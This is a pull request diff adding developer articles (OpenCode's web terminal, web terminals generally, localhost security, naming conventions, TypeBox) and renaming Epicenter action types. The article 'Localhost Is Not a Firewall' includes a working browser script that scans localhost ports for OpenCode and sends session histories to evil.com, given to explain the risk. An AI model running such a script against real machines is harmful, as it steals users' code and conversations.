### PR TITLE
refactor(epicenter): naming inversion and skills migration

### DIFF
--- a/docs/articles/how-opencode-web-works.md
+++ b/docs/articles/how-opencode-web-works.md
@@ -1,0 +1,154 @@
+# How OpenCode Web Works
+
+When you run `opencode web` and open it in a browser, you're not looking at a chat interface with a terminal-like skin. You're looking at a real terminal—raw bytes, ANSI escape sequences, cursor positioning—streamed over WebSocket to a JavaScript terminal emulator running in your browser.
+
+This article explains the architecture.
+
+---
+
+## The Architecture
+
+```
+┌─────────────────────────┐      WebSocket      ┌──────────────────────────┐
+│  Browser / Desktop App  │◄───────────────────►│  OpenCode Backend        │
+│  (SolidJS)              │                     │  (Bun HTTP Server)       │
+│                         │                     │                          │
+│  ┌───────────────────┐  │      PTY/WS        │  ┌────────────────────┐  │
+│  │ ghostty-web       │◄─┼─────────────────────┼─►│ Pseudo Terminal    │  │
+│  │ (WASM terminal)   │  │   raw bytes         │  │ (PTY)              │  │
+│  └───────────────────┘  │                     │  └────────────────────┘  │
+└─────────────────────────┘                     └──────────────────────────┘
+```
+
+Three pieces make this work:
+
+1. **OpenCode Backend**: A Bun HTTP server that handles API requests and manages PTY sessions
+2. **ghostty-web**: Ghostty's terminal emulator compiled to WebAssembly, running in the browser
+3. **WebSocket transport**: Real-time bidirectional communication between browser and PTY
+
+---
+
+## Starting a Server
+
+When you run `opencode` or `opencode web`, a Bun HTTP server starts on your machine:
+
+```typescript
+// Port allocation logic
+if (opts.port === 0) {
+	try {
+		return Bun.serve({ ...args, port: 4096 }); // Try default port
+	} catch {
+		// Port taken, let OS assign one
+	}
+}
+return Bun.serve({ ...args, port: opts.port });
+```
+
+The first instance claims port 4096. Every subsequent instance gets a random available port (the OS picks when you pass `port: 0` to Bun.serve). This means you can run as many OpenCode servers as you want, each on a different port.
+
+You can connect any number of clients to each server. Open the same URL in multiple browser tabs—they all connect to the same backend and share state.
+
+---
+
+## The Terminal Connection
+
+When the web app loads, it doesn't just render a fancy chat UI. It creates a real terminal session.
+
+The split terminal at the bottom of OpenCode's interface is a PTY connection over WebSocket. Here's what happens when it mounts:
+
+```typescript
+// From packages/desktop/src/components/terminal.tsx
+import { Ghostty, Terminal as Term, FitAddon } from "ghostty-web"
+
+onMount(async () => {
+  // Load Ghostty's WASM terminal emulator
+  ghostty = await Ghostty.load()
+
+  // Connect to the PTY session over WebSocket
+  ws = new WebSocket(sdk.url + `/pty/${local.pty.id}/connect?directory=${...}`)
+
+  // Create the terminal instance
+  term = new Term({
+    cursorBlink: true,
+    fontSize: 14,
+    fontFamily: "IBM Plex Mono, monospace",
+  })
+})
+```
+
+The `ghostty-web` package is Ghostty—the native terminal emulator written in Zig—compiled to WebAssembly. It's not xterm.js. It's the same parser that runs in the desktop Ghostty app, just running in your browser.
+
+---
+
+## What Flows Over the Wire
+
+The WebSocket connection streams raw terminal bytes. When you type a character:
+
+1. Your keystroke goes to the browser's ghostty-web instance
+2. ghostty-web sends the raw byte over WebSocket to the backend
+3. The backend writes that byte to the PTY
+4. The shell (or whatever's running in the PTY) processes it
+5. Output comes back through the PTY → WebSocket → ghostty-web
+6. ghostty-web renders it
+
+This is the same flow as a desktop terminal, just with WebSocket in the middle instead of a direct PTY connection.
+
+```
+You type "ls"     →  WebSocket  →  PTY  →  shell processes
+                                           ↓
+rendered output  ←  WebSocket  ←  PTY  ←  shell outputs file list
+```
+
+The browser receives raw ANSI escape sequences—the same bytes your iTerm or Ghostty desktop app would receive. `\x1b[32m` for green text, `\x1b[0m` to reset, cursor positioning codes, everything. ghostty-web parses and renders them.
+
+---
+
+## Multiple Communication Channels
+
+OpenCode uses multiple WebSocket connections for different purposes:
+
+| Channel | Endpoint           | Purpose                                   |
+| ------- | ------------------ | ----------------------------------------- |
+| PTY     | `/pty/:id/connect` | Terminal I/O (keystrokes ↔ output)        |
+| Events  | `/events`          | Real-time status updates, session changes |
+| Share   | `/share_poll`      | Live session sharing with others          |
+
+The PTY channel is the "terminal at the bottom." The Events channel powers the rest of the UI—showing you when the AI is thinking, when files change, etc.
+
+---
+
+## Why This Architecture
+
+OpenCode could have built a chat-style interface that renders messages as HTML. Many AI coding tools do. Instead, they chose to stream real terminal output.
+
+The benefits:
+
+1. **Correctness**: Any program that works in a terminal works in OpenCode. Vim, htop, anything with colors or TUI—it just works because it's a real PTY.
+
+2. **Consistency**: The web experience matches the CLI experience exactly. Same rendering, same keybindings, same everything.
+
+3. **Battle-tested parsing**: Ghostty's terminal parser handles edge cases that simpler approaches miss. By compiling it to WASM, OpenCode gets that correctness for free.
+
+The tradeoff is complexity. You need WASM compilation, WebSocket plumbing, and PTY management. But for a tool that's fundamentally about running code in terminals, it makes sense.
+
+---
+
+## Running Multiple Instances
+
+Because each OpenCode invocation is an independent Bun server:
+
+- `opencode` in project A → port 4096
+- `opencode` in project B → port 52341 (random)
+- `opencode` in project C → port 49872 (random)
+
+Each has its own sessions, its own PTY processes, its own state. Open each in a different browser tab and they're completely isolated.
+
+Within a single server, you can also run multiple AI sessions in parallel on the same project. The server manages them all.
+
+---
+
+## Summary
+
+OpenCode's web UI is a real terminal emulator (ghostty-web/WASM) connected to a real PTY (on the Bun backend) over WebSocket. Every keystroke travels to the server; every byte of output travels back. Multiple servers can run on different ports, and multiple clients can connect to each server.
+
+It's not a chat interface with terminal styling. It's an actual terminal, streamed to your browser.

--- a/docs/articles/how-web-terminals-work.md
+++ b/docs/articles/how-web-terminals-work.md
@@ -1,0 +1,135 @@
+# How Web Terminals Work
+
+When you see a terminal running inside a browser—like a web-based SSH client, VS Code's remote terminal, or Replit's console—it looks exactly like the real thing. That's because, in a sense, it _is_ the real thing. The browser is literally receiving raw terminal output and rendering it with a JavaScript-based terminal emulator.
+
+This article explains how that works.
+
+---
+
+## What Terminal Emulators Actually Do
+
+A terminal emulator has one job: interpret a stream of bytes and render them visually. Most of those bytes are just text, but some are **ANSI escape sequences**—special codes that control formatting, cursor position, colors, and more.
+
+For example, the bytes `\x1b[32mHello\x1b[0m` mean:
+
+- `\x1b[32m` → switch to green text
+- `Hello` → print "Hello"
+- `\x1b[0m` → reset formatting
+
+When you run a CLI tool like `ls --color` or `vim`, the program writes these escape sequences to stdout. The terminal emulator parses them and draws the appropriate output.
+
+This is true whether your terminal is iTerm, Ghostty, Windows Terminal, or xterm.js running in a browser.
+
+---
+
+## The Desktop Architecture
+
+On a desktop, the flow looks like this:
+
+```
+┌────────────────────────────────────────────┐
+│  Terminal Emulator (Ghostty, iTerm, etc.)  │
+│  ┌──────────────────────────────────────┐  │
+│  │  PTY (pseudo-terminal)               │  │
+│  │  ┌────────────────────────────────┐  │  │
+│  │  │  Shell (zsh, bash)             │  │  │
+│  │  │  ┌──────────────────────────┐  │  │  │
+│  │  │  │  Your program (vim, ls)  │  │  │  │
+│  │  │  └──────────────────────────┘  │  │  │
+│  │  └────────────────────────────────┘  │  │
+│  └──────────────────────────────────────┘  │
+└────────────────────────────────────────────┘
+```
+
+The **PTY** (pseudo-terminal) is a kernel-level abstraction that mimics a hardware terminal. It's a bidirectional pipe: the shell writes output to it, and the terminal emulator reads from it. When you type, the terminal emulator writes to the PTY, and the shell reads it.
+
+Programs don't know or care whether they're running in a "real" terminal or an emulator. They just read from stdin and write to stdout. The PTY makes everything look the same.
+
+---
+
+## The Web Architecture
+
+Here's the interesting part: web terminals use the exact same byte stream. They just transport it over the network.
+
+```
+┌──────────────────┐       WebSocket        ┌────────────────────┐
+│     Browser      │◄──────────────────────►│      Server        │
+│                  │    raw PTY bytes       │                    │
+│   xterm.js or    │   (ANSI sequences)     │   PTY ← shell      │
+│   libghostty-vt  │                        │          ↑         │
+│                  │                        │       program      │
+└──────────────────┘                        └────────────────────┘
+```
+
+The server creates a PTY, spawns a shell, and streams the PTY's output over a WebSocket. The browser receives the raw bytes—escape sequences and all—and feeds them to a JavaScript terminal emulator.
+
+When you type, keystrokes are sent back over the WebSocket. The server writes them to the PTY. The shell processes them, produces output, and the cycle continues.
+
+This is exactly what tools like **ttyd**, **wetty**, and **gotty** do. It's also how VS Code's remote terminal works when you connect to a server.
+
+---
+
+## Terminal Emulator Libraries
+
+Several libraries exist for rendering terminal output in a browser:
+
+### xterm.js
+
+The most popular option. Used by VS Code, Hyper, and many web SSH clients. It's a TypeScript library that handles:
+
+- VT100/xterm escape sequence parsing
+- Text rendering with WebGL or Canvas
+- Mouse and keyboard input
+- Selection and clipboard
+
+### libghostty-vt (WebAssembly)
+
+Ghostty—a native terminal emulator written in Zig—ships `libghostty-vt`, a library containing just the terminal parsing logic. It can be compiled to WebAssembly, meaning you can use Ghostty's battle-tested parser in a browser.
+
+This is useful if you want a more correct or performant parser than xterm.js provides. You'd still need to handle rendering yourself (or integrate with another library).
+
+### Other Options
+
+- **hterm** (Google's terminal for Chrome OS)
+- **terminaljs** (lightweight, less feature-complete)
+
+---
+
+## Not Everything Is a Web Terminal
+
+It's important to distinguish true web terminals from chat interfaces:
+
+| Web Terminal                       | Chat Interface                |
+| ---------------------------------- | ----------------------------- |
+| Streams raw PTY bytes              | Sends structured JSON         |
+| Uses ANSI escape sequences         | Uses Markdown/HTML            |
+| Terminal emulator in browser       | Standard web UI components    |
+| Examples: web SSH, Replit terminal | Examples: ChatGPT, Claude web |
+
+When you use Claude or ChatGPT in a browser, there's no terminal involved. The server sends structured data (usually JSON over Server-Sent Events or WebSocket), and the frontend renders it as formatted HTML.
+
+CLI tools like OpenCode, on the other hand, run _inside_ a terminal. They write ANSI escape sequences to stdout, and your terminal emulator (Ghostty, iTerm, whatever) renders them. If you wanted OpenCode in a browser, you'd need to:
+
+1. Run OpenCode on a server inside a PTY
+2. Stream the PTY output over WebSocket
+3. Render it with xterm.js or similar
+
+---
+
+## Why This Matters
+
+Understanding this architecture clarifies several things:
+
+1. **Why web terminals feel native**: They're rendering the exact same bytes a desktop terminal would. The only difference is transport.
+
+2. **Why latency matters**: Every keystroke requires a round-trip to the server. This is why local terminals feel snappier than web-based ones.
+
+3. **Why you can't "just port" a CLI to the web**: A CLI tool expects to run inside a PTY. To use it in a browser, you need the full stack: server-side PTY, WebSocket transport, and client-side terminal emulator.
+
+4. **Why projects like libghostty-vt exist**: Building a correct terminal parser is hard. By extracting it into a library (especially one that compiles to WASM), other projects can reuse that work.
+
+---
+
+## Summary
+
+A web terminal is simpler than it looks: raw bytes over WebSocket, parsed by a JavaScript terminal emulator. The same escape sequences that make `vim` work in iTerm make it work in a browser—you just need the right plumbing to get them there.

--- a/docs/articles/localhost-is-not-a-firewall.md
+++ b/docs/articles/localhost-is-not-a-firewall.md
@@ -1,0 +1,249 @@
+# Localhost Is Not a Firewall
+
+Every time you run a dev server, you open a door. `npm run dev`, `opencode`, `jupyter notebook`, `docker`—they all bind to localhost and listen for connections. The implicit assumption is that localhost is safe. Only you can connect, right?
+
+Wrong. Any website you visit can send requests to localhost. And if that server responds with `Access-Control-Allow-Origin: *`, the website can read the response too.
+
+This article explains why, and why the industry has collectively decided not to care.
+
+---
+
+## The Attack
+
+You're working on a project. OpenCode is running on port 4096. You take a break and browse Reddit. One of the links goes to a sketchy site. That site runs this JavaScript:
+
+```javascript
+// Probe for OpenCode
+for (let port = 4096; port < 4200; port++) {
+	fetch(`http://localhost:${port}/session/list`)
+		.then((r) => r.json())
+		.then((sessions) => {
+			// Found it. Now exfiltrate session history.
+			sessions.forEach((s) => {
+				fetch(`http://localhost:${port}/session/${s.id}/messages`)
+					.then((r) => r.json())
+					.then((messages) => {
+						// Send your code and AI conversations to attacker's server
+						fetch('https://evil.com/collect', {
+							method: 'POST',
+							body: JSON.stringify({ port, session: s.id, messages }),
+						});
+					});
+			});
+		})
+		.catch(() => {}); // Port not open or wrong service, try next
+}
+```
+
+If the dev server returns `Access-Control-Allow-Origin: *` (and many do), this works. The attacker now has your session history, code snippets, API responses—whatever that localhost server exposes.
+
+---
+
+## Why Browsers Allow This
+
+The browser's same-origin policy is designed to prevent `evil.com` from reading data from `bank.com`. But localhost isn't special to the browser. It's just another origin.
+
+**What the same-origin policy does:**
+
+- Prevents cross-origin reads by default
+- Allows cross-origin writes (form submissions, fetch POST)
+- Can be relaxed with CORS headers
+
+**What it doesn't do:**
+
+- Prevent requests from being sent
+- Treat localhost as privileged
+- Block connections to local network IPs
+
+When you visit `evil.com`, JavaScript on that page can:
+
+1. `fetch('http://localhost:4096/...')` — request is sent
+2. Server processes request — side effects happen
+3. Browser checks CORS headers — decides if JS can read response
+
+Steps 1 and 2 happen regardless of CORS. If the server does something destructive on a POST request, the damage is done before the browser even checks headers.
+
+And if the server returns `Access-Control-Allow-Origin: *`, step 3 passes too. The attacker reads everything.
+
+---
+
+## The CORS: \* Epidemic
+
+Here's what OpenCode's server does:
+
+```typescript
+import { cors } from 'hono/cors';
+
+app.use(cors()); // Defaults to Access-Control-Allow-Origin: *
+```
+
+This is common. Many dev tools do this because:
+
+1. **Convenience** — no CORS errors when accessing from different ports
+2. **"It's just local"** — assumption that localhost is safe
+3. **Copy-paste culture** — tutorials show `cors()` with no options
+
+The result: a dev server that accepts requests from any origin and lets any origin read responses.
+
+---
+
+## Tools That Are Vulnerable
+
+| Tool               | Default Behavior              | Mitigation             |
+| ------------------ | ----------------------------- | ---------------------- |
+| OpenCode           | CORS: \*, no auth             | None                   |
+| Jupyter Notebook   | Was open → now requires token | Token in URL           |
+| webpack-dev-server | CORS: \* in dev               | None (by design)       |
+| Vite               | CORS: \* in dev               | None (by design)       |
+| Create React App   | CORS: \* in dev               | None (by design)       |
+| Docker API         | No auth if TCP-exposed        | Unix socket by default |
+| Redis              | No auth by default            | Bind to 127.0.0.1 only |
+| Elasticsearch      | No auth by default            | Security plugin (paid) |
+
+The pattern: tools ship wide open, security is opt-in (if available at all).
+
+---
+
+## "But It's Only Localhost"
+
+The mental model most developers have:
+
+```
+Internet ─── Firewall ─── Your Machine ─── Localhost
+                                              │
+                              "Safe zone, only I can access"
+```
+
+The actual model:
+
+```
+Internet ─── Browser ─── JavaScript ─── fetch('localhost:...')
+                              │
+              "Browser JS can hit any local port"
+```
+
+Your browser is a bridge. Every tab is a potential attacker with access to your local network.
+
+---
+
+## What Attackers Can Do
+
+**With a vulnerable localhost server:**
+
+| If attacker can...  | They can...                                   |
+| ------------------- | --------------------------------------------- |
+| Read responses      | Exfiltrate source code, secrets, session data |
+| Send POST requests  | Trigger actions, modify files, run commands   |
+| Open WebSockets     | Get real-time access to terminals, logs       |
+| Guess/enumerate IDs | Access sessions, files, resources             |
+
+**Real-world examples:**
+
+- **2018**: Researchers showed they could steal code from VS Code's live share via localhost
+- **2019**: Jupyter Notebook attacks in the wild → led to mandatory token auth
+- **2020**: Docker API exploits for cryptomining (when exposed on TCP)
+- **Ongoing**: Electron apps with localhost servers are frequent targets
+
+---
+
+## Why the Industry Doesn't Fix This
+
+**Developer experience wins:**
+
+Adding authentication means:
+
+- Copying tokens from terminal to browser
+- Dealing with "401 Unauthorized" errors
+- Explaining to users why they need a token for a local server
+
+Most developers would call this "friction" and disable it.
+
+**"It's a dev tool":**
+
+The argument goes: "This only runs on your machine during development. If your machine is compromised, you have bigger problems."
+
+This ignores that browsing the web IS the attack vector. You don't need malware. You need one bad link.
+
+**Nobody wants to be first:**
+
+If Vite adds mandatory auth and webpack doesn't, developers will complain that Vite is "harder to use." There's a race to the bottom on security friction.
+
+---
+
+## What Good Looks Like
+
+Some tools do this right:
+
+**Jupyter Notebook:**
+
+```
+http://localhost:8888/?token=abc123def456...
+```
+
+Token generated on startup, required for all requests. Annoying? Slightly. Secure? Yes.
+
+**VS Code Server:**
+
+```
+http://localhost:8080/?tkn=xyz789...
+```
+
+Same pattern. The token is printed to terminal, you copy it once.
+
+**Proper CORS:**
+
+```typescript
+app.use(
+	cors({
+		origin: ['http://localhost:3000', 'http://127.0.0.1:3000'],
+		// Only allow requests from your own dev server
+	}),
+);
+```
+
+Explicit allowlist instead of `*`.
+
+---
+
+## What You Can Do
+
+**As a user:**
+
+1. **Be aware** — that dev server is a door to your machine
+2. **Use the desktop app when available** — OpenCode's desktop app doesn't expose HTTP
+3. **Close dev servers when not using them** — don't leave them running overnight
+4. **Segment browsing** — use a different browser/profile for sketchy sites
+
+**As a tool author:**
+
+1. **Don't default to CORS: \*** — require explicit origin configuration
+2. **Add token auth** — generate on startup, print to terminal
+3. **Check Origin header** — reject requests from non-localhost origins
+4. **Document the risk** — let users make informed choices
+
+**As an industry:**
+
+Maybe we should stop accepting "it's just for development" as an excuse. The browser doesn't know the difference between your bank and your dev server. Both are just HTTP endpoints.
+
+---
+
+## The Uncomfortable Truth
+
+This has been a known issue for over a decade. The industry response has been:
+
+1. Acknowledge it exists
+2. Decide it's not worth the UX cost to fix
+3. Hope users don't visit malicious sites while coding
+
+That's not security. That's wishful thinking.
+
+Every dev server you run is trusting every website you visit. That's the deal we've implicitly accepted. Maybe it's time to renegotiate.
+
+---
+
+## Further Reading
+
+- [The Dangers of Google Chrome's Localhost Access](https://medium.com/@petehouston/the-dangers-of-google-chromes-localhost-access-7b4d6c1d1a0a)
+- [Jupyter Notebook Security Advisory](https://blog.jupyter.org/jupyter-notebook-security-fixes-released-4a9d4d9ecdd7)
+- [DNS Rebinding Attacks Explained](https://github.com/nccgroup/singularity)
+- [Attacking Local Network Applications from the Browser](https://www.forcepoint.com/blog/x-labs/attacking-internal-network-browser)

--- a/docs/articles/naming-inversion-pattern.md
+++ b/docs/articles/naming-inversion-pattern.md
@@ -1,0 +1,42 @@
+# Naming Inversion
+
+Name things by how they're **used**, not how they're created. The thing you interact with most gets the simple name.
+
+## Type Inversion
+
+When you have a factory function and its return type, the return type gets the clean name.
+
+```typescript
+// Before: factory gets the good name
+type Action = () => ActionExports;
+type ActionExports = { ... };
+
+// After: what you USE gets the good name
+type ActionFactory = () => Actions;
+type Actions = { ... };
+```
+
+Real example from this codebase:
+
+- `ProviderExports` → `Providers` (the thing you use)
+- `ActionExports` → `Actions` (the thing you call)
+
+## Variable Inversion
+
+The final form of data gets the clean name. Earlier stages get prefixes.
+
+```typescript
+// Before: final form has the longest name
+const input = getInput();
+const parsedInput = JSON.parse(input);
+const validatedInput = validate(parsedInput);
+doStuff(validatedInput); // verbose
+
+// After: final form has the clean name
+const rawInput = getInput();
+const parsed = JSON.parse(rawInput);
+const input = validate(parsed);
+doStuff(input); // clean
+```
+
+The variable you use 10 times shouldn't have a suffix on it.

--- a/docs/articles/typebox-compile-arbitrary-json-schema.md
+++ b/docs/articles/typebox-compile-arbitrary-json-schema.md
@@ -1,0 +1,81 @@
+# TypeBox: Compile Any JSON Schema Object
+
+If you have a JSON Schema as a plain JavaScript object and you want a validator, TypeBox does exactly this. No setup, no configuration, no ceremony.
+
+## The Simplest Case
+
+```typescript
+import { Compile } from 'typebox/compile';
+
+const schema = {
+	type: 'object',
+	required: ['name', 'age'],
+	properties: {
+		name: { type: 'string' },
+		age: { type: 'number', minimum: 0 },
+	},
+} as const;
+
+const validator = Compile(schema);
+
+validator.Check({ name: 'Alice', age: 30 }); // true
+validator.Check({ name: 'Bob', age: -5 }); // false (age below minimum)
+validator.Check({ name: 'Charlie' }); // false (missing age)
+```
+
+That's it. Pass a JSON Schema object to `Compile`, get a validator back.
+
+## Where the Schema Comes From Doesn't Matter
+
+The schema can come from anywhere:
+
+```typescript
+// From a config file
+const schema = JSON.parse(fs.readFileSync('schema.json', 'utf-8'));
+const validator = Compile(schema);
+
+// From an API response
+const response = await fetch('/api/schema');
+const schema = await response.json();
+const validator = Compile(schema);
+
+// From a database
+const schema = await db.query('SELECT schema FROM schemas WHERE name = ?', [
+	'user',
+]);
+const validator = Compile(schema);
+
+// From another device over WebSocket/HTTP
+const schema = JSON.parse(message.data);
+const validator = Compile(schema);
+
+// Hardcoded in your code
+const schema = { type: 'string', minLength: 1 } as const;
+const validator = Compile(schema);
+```
+
+For more on sending schemas across the network, see [JSON Schema Over the Wire](./typebox-json-schema-over-the-wire.md).
+
+## Getting Errors
+
+```typescript
+const validator = Compile(schema);
+
+if (!validator.Check(data)) {
+	const errors = [...validator.Errors(data)];
+	errors.forEach((err) => {
+		console.log(`${err.path}: ${err.message}`);
+	});
+}
+```
+
+## When to Use This
+
+Use TypeBox when:
+
+- You have JSON Schema from an external source
+- You're receiving schema definitions at runtime
+- You want to validate without defining types twice
+- You need a validator from a plain object, no questions asked
+
+TypeBox doesn't care how you got the schema. Hand it a valid JSON Schema object, it gives you a validator. Simple as that.

--- a/docs/articles/typebox-is-a-beast.md
+++ b/docs/articles/typebox-is-a-beast.md
@@ -1,0 +1,100 @@
+# TypeBox is a Beast
+
+TypeBox is deceptively simple. At its core, everything in TypeBox is just a thin wrapper around JSON Schema. When you call `Type.Object()`, you're not creating some proprietary runtime type; you're building a plain JSON Schema object that happens to also infer TypeScript types.
+
+## It's Just JSON Schema
+
+```typescript
+import { Type } from 'typebox';
+
+const UserSchema = Type.Object({
+	id: Type.String(),
+	name: Type.String(),
+	email: Type.String(),
+});
+
+console.log(JSON.stringify(UserSchema, null, 2));
+```
+
+Output:
+
+```json
+{
+	"type": "object",
+	"required": ["id", "name", "email"],
+	"properties": {
+		"id": { "type": "string" },
+		"name": { "type": "string" },
+		"email": { "type": "string" }
+	}
+}
+```
+
+No magic. No runtime transformation. The schema object IS the JSON Schema. You can serialize it, store it, send it anywhere.
+
+## Raw JSON Schema In, Validator Out
+
+Here's where TypeBox flexes. The `Compile` function doesn't just accept TypeBox schemas; it accepts any valid JSON Schema object:
+
+```typescript
+import { Compile } from 'typebox/compile';
+
+const rawSchema = {
+	type: 'object',
+	required: ['id', 'name'],
+	properties: {
+		id: { type: 'number' },
+		name: { type: 'string' },
+	},
+} as const;
+
+const validator = Compile(rawSchema);
+
+validator.Check({ id: 1, name: 'Alice' }); // true
+validator.Check({ id: 'x', name: 'Bob' }); // false
+```
+
+The `as const` assertion preserves literal types for better TypeScript inference, but isn't required for runtime validation to work.
+
+This means you can take JSON Schema from anywhere: a config file, an API response, a database; run it through `Compile`, and get a working validator.
+
+## Compile vs Value.Check
+
+TypeBox gives you two ways to validate:
+
+**`Compile`** generates optimized validation code. Use it when you'll validate the same schema many times:
+
+```typescript
+import { Compile } from 'typebox/compile';
+
+const validator = Compile(schema);
+
+items.forEach((item) => {
+	if (validator.Check(item)) {
+		process(item);
+	}
+});
+```
+
+**`Value.Check`** validates directly without compilation overhead. Use it for one-off validations:
+
+```typescript
+import { Value } from 'typebox/value';
+
+if (Value.Check(schema, singleItem)) {
+	process(singleItem);
+}
+```
+
+Rule of thumb: if you're validating in a loop or the schema lives for the lifetime of your app, use `Compile`. For quick one-time checks, `Value.Check` avoids the upfront cost.
+
+## Why This Matters
+
+Most validation libraries create an abstraction that hides the underlying format. TypeBox does the opposite: the abstraction IS the format. This has real consequences:
+
+1. **Interoperability**: Your schemas work with any JSON Schema tooling
+2. **Serialization**: Schemas are plain objects; `JSON.stringify` just works
+3. **Portability**: Send schemas over the network, store them in databases
+4. **Inspection**: Debug by logging the schema; it's readable JSON
+
+TypeBox treats JSON Schema as a first-class citizen rather than an export target. The TypeScript types are the bonus, not the other way around.

--- a/docs/articles/typebox-json-schema-over-the-wire.md
+++ b/docs/articles/typebox-json-schema-over-the-wire.md
@@ -1,0 +1,76 @@
+# TypeBox: JSON Schema Over the Wire
+
+Because TypeBox schemas are just JSON Schema objects, you can serialize them across the network, reconstruct them on the other side, and compile them into validators at runtime. No code generation, no shared build-time dependencies.
+
+## The Pattern
+
+1. Define schemas on one device
+2. Serialize them as JSON
+3. Send them over the network
+4. Reconstruct and compile them on the receiving device
+
+```typescript
+// Device A: Expose available actions
+const actions = {
+	createUser: {
+		input: {
+			type: 'object',
+			required: ['name', 'email'],
+			properties: {
+				name: { type: 'string' },
+				email: { type: 'string', format: 'email' },
+			},
+		},
+		output: {
+			type: 'object',
+			required: ['id'],
+			properties: {
+				id: { type: 'string' },
+			},
+		},
+	},
+};
+
+// Broadcast over WebSocket, HTTP, etc.
+const payload = JSON.stringify(actions);
+```
+
+```typescript
+// Device B: Receive and compile
+import { Compile } from 'typebox/compile';
+
+const actions = JSON.parse(payload);
+
+const inputValidator = Compile(actions.createUser.input);
+const outputValidator = Compile(actions.createUser.output);
+
+// Now Device B can validate requests before sending
+// and validate responses when receiving
+```
+
+## Why This Matters for Epicenter
+
+In Epicenter's architecture, devices expose actions to each other. When a device connects, it broadcasts its available actions along with their JSON Schema definitions. Other devices can then:
+
+1. **Discover** what actions are available
+2. **Validate requests** before sending them
+3. **Validate responses** when receiving them
+4. **Generate UI** or documentation from the schemas
+
+The schema becomes a contract that travels with the action definition. No need for code generation. No need for shared type definitions at build time. The schema is the source of truth, and it's portable.
+
+## Schema as Contract
+
+Traditional approaches require both sides to share type definitions at compile time. With JSON Schema over the wire:
+
+- Sender defines the contract (schema)
+- Contract travels with the message
+- Receiver compiles and enforces the contract at runtime
+
+This enables true runtime discovery. A new device can connect, broadcast its capabilities, and other devices immediately know how to interact with it; all without redeploying or rebuilding anything.
+
+## Summary
+
+TypeBox schemas are JSON Schema. JSON Schema is just JSON. JSON travels over the wire. This enables runtime schema discovery and validation across distributed systems without shared build-time dependencies.
+
+See also: [TypeBox is a Beast](./typebox-is-a-beast.md) for more on TypeBox's core capabilities.

--- a/packages/epicenter/README.md
+++ b/packages/epicenter/README.md
@@ -1569,12 +1569,11 @@ import {
 	isQuery,
 	isMutation,
 	extractActions,
-	defineWorkspaceExports,
+	defineActionExports,
 	type Query,
 	type Mutation,
 	type Action,
-	type WorkspaceActionMap,
-	type WorkspaceExports,
+	type ActionExports,
 } from '@epicenter/hq';
 ```
 
@@ -1596,7 +1595,7 @@ Define a mutation action (write operation).
 
 Filter workspace exports to just actions.
 
-**`defineWorkspaceExports<T>(exports)`**
+**`defineActionExports<T>(exports)`**
 
 Identity function for type inference.
 

--- a/packages/epicenter/README.md
+++ b/packages/epicenter/README.md
@@ -1174,19 +1174,6 @@ isQuery(value); // value is Query
 isMutation(value); // value is Mutation
 ```
 
-### Extract Actions
-
-Filter workspace exports to just actions:
-
-```typescript
-import { extractActions } from '@epicenter/hq';
-
-const actions = extractActions(workspaceExports);
-// { actionName: Query | Mutation, ... }
-```
-
-Useful for API/MCP mapping. Non-action exports (utilities, constants) are filtered out.
-
 ## Providers
 
 Providers are defined as a map and can attach capabilities to YJS documents. They run in parallel during workspace initialization.
@@ -1568,12 +1555,11 @@ import {
 	isAction,
 	isQuery,
 	isMutation,
-	extractActions,
-	defineActionExports,
+	defineActions,
 	type Query,
 	type Mutation,
 	type Action,
-	type ActionExports,
+	type Actions,
 } from '@epicenter/hq';
 ```
 
@@ -1591,11 +1577,7 @@ Define a mutation action (write operation).
 - `isQuery(value)`: Check if value is Query
 - `isMutation(value)`: Check if value is Mutation
 
-**`extractActions(exports)`**
-
-Filter workspace exports to just actions.
-
-**`defineActionExports<T>(exports)`**
+**`defineActions<T>(exports)`**
 
 Identity function for type inference.
 
@@ -1623,7 +1605,7 @@ import { markdownProvider, type MarkdownProviderConfig } from '@epicenter/hq';
 import {
 	type Provider,
 	type ProviderContext,
-	type ProviderExports,
+	type Providers,
 	type WorkspaceProviderMap,
 } from '@epicenter/hq';
 ```

--- a/packages/epicenter/src/cli/cli-end-to-end.test.ts
+++ b/packages/epicenter/src/cli/cli-end-to-end.test.ts
@@ -47,7 +47,7 @@ describe('CLI End-to-End Tests', () => {
 			markdown: (c) => markdownProvider(c, { directory: './content' }),
 		},
 
-		exports: ({ tables, providers }) => ({
+		actions: ({ tables, providers }) => ({
 			listPosts: defineQuery({
 				handler: async () => {
 					const posts = await providers.sqlite.db

--- a/packages/epicenter/src/cli/cli.ts
+++ b/packages/epicenter/src/cli/cli.ts
@@ -1,7 +1,7 @@
 import type { TaggedError } from 'wellcrafted/error';
 import { isResult, type Result } from 'wellcrafted/result';
 import yargs from 'yargs';
-import { type WorkspaceExports, walkActions } from '../core/actions';
+import { type ActionExports, walkActions } from '../core/actions';
 import type { AnyWorkspaceConfig, EpicenterClient } from '../core/workspace';
 import type { WorkspaceClient } from '../core/workspace/client.node';
 import { createServer, DEFAULT_PORT } from '../server/server';
@@ -57,7 +57,7 @@ export function createCLI<
 	for (const [workspaceId, workspaceClient] of Object.entries(
 		workspaceClients,
 	)) {
-		const typedClient = workspaceClient as WorkspaceClient<WorkspaceExports>;
+		const typedClient = workspaceClient as WorkspaceClient<ActionExports>;
 		const {
 			destroy: _,
 			[Symbol.asyncDispose]: __,

--- a/packages/epicenter/src/cli/cli.ts
+++ b/packages/epicenter/src/cli/cli.ts
@@ -1,7 +1,7 @@
 import type { TaggedError } from 'wellcrafted/error';
 import { isResult, type Result } from 'wellcrafted/result';
 import yargs from 'yargs';
-import { type ActionExports, walkActions } from '../core/actions';
+import { type Actions, walkActions } from '../core/actions';
 import type { AnyWorkspaceConfig, EpicenterClient } from '../core/workspace';
 import type { WorkspaceClient } from '../core/workspace/client.node';
 import { createServer, DEFAULT_PORT } from '../server/server';
@@ -57,12 +57,12 @@ export function createCLI<
 	for (const [workspaceId, workspaceClient] of Object.entries(
 		workspaceClients,
 	)) {
-		const typedClient = workspaceClient as WorkspaceClient<ActionExports>;
+		const typedClient = workspaceClient as WorkspaceClient<Actions>;
 		const {
 			destroy: _,
 			[Symbol.asyncDispose]: __,
 			$ydoc: ___,
-			...workspaceExports
+			...workspaceActions
 		} = typedClient;
 
 		cli = cli.command(
@@ -74,7 +74,7 @@ export function createCLI<
 					.demandCommand(1, 'You must specify an action')
 					.strict();
 
-				for (const { path, action } of walkActions(workspaceExports)) {
+				for (const { path, action } of walkActions(workspaceActions)) {
 					const actionName = path.join('_');
 					workspaceCli = workspaceCli.command(
 						actionName,

--- a/packages/epicenter/src/cli/discovery.test.ts
